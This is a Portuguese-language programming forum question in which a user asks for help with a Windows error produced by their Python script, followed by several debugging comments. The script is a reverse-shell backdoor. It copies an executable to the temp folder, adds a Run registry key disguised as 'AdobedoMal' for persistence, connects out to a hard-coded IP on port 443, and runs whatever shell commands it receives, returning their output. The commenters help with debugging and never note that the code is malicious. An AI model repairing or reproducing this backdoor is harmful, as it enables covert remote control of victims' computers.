# A sintaxe do nome do arquivo, do nome do diretorio ou do rotulo do volume esta incorreta

Tags: python

Não estou conseguindo resolver esse problema que fala: "A sintaxe do nome do arquivo, do nome do diretório ou do rotulo do volume esta incorreta". Imaginava que era caminho mal especificado, mas creio que não seja.

```
import socket,time,subprocess,tempfile,os
ip='192.168.0.102'
port=443
FILENAME='teste.exe'
TEMPDIR=tempfile.gettempdir()
def autorun():
  try:
   os.system("copy "+FILENAME+""+TEMPDIR)
   except:
    print("Erro na cópia")
        pass
    try:
        FNULL=open(os.devnull, 'w')
        subprocess.Popen("REG ADDHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\""/v AdobedoMal /d" +TEMPDIR+"\\"+FILENAME, stdout=FNULL,stderr=FNULL)
    except:
        print("Erro no registro")
        pass def connect(ip,port):
    try:
        s=socket.socket()
        s.connect((ip,port))
        s.send(b'Conecxao Recebida')
        return s
    except Exception as e:
        print('Erro de conexao:\n', e)
        return None def listen(s): try:
        while True:
            data=s.recv(1024)
            if data[:-1]== 'exit':
                s.close()
                exit(0)
            else:
                cmd(s,data)   except:
       error(s) def cmd(s,data):try:   proc=subprocess.Popen(data.decode(), shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    dados=proc.stdout.read()+proc.stderr.read()
s.send(dados)
  except:
      error(s)
def error(s):
 if s:
    s.close()
 main()
def main():
 while True:
    s_conectado=connect(ip,port)
    if s_conectado:
        listen(s_conectado)
    else:
        print("Conexao deu erro")
        time.sleep(1)
autorun()
main()
```

Comment: `Run\\""/v AdobedoMal`, estas aspas, em particular, me causaram estranheza. Elas estão corretas? Parecem estar soltas no meio da string;

Comment: Estão sim, elas não estão incorretas.

Comment: Os seus try/except estão mascarando o verdadeiro erro. Para ajudar precisamos do erro completo gerado pelo python, com o traceback completo mostrando o caminho até o erro. Remova os try/except do seu código e rode-o novamente, e então, quando der o erro, copie a mensagem de erro completa gerada pelo python e cole na pergunta

Comment: O erro persiste mesmo com a retirada do try

Comment: @C.J então, por favor, após retirar o `try`, o erro aparecerá completo na tela, copie o e cole na pergunta

Comment: Com o eu disse, o erro que aparece mesmo com a retirada do try é "A sintaxe do nome do arquivo, do nome do diretorio ou do rotulo do volume esta incorreta", tbm não compreendo mas é o que aparece. não fala de nenhum outro erro, apenas esse !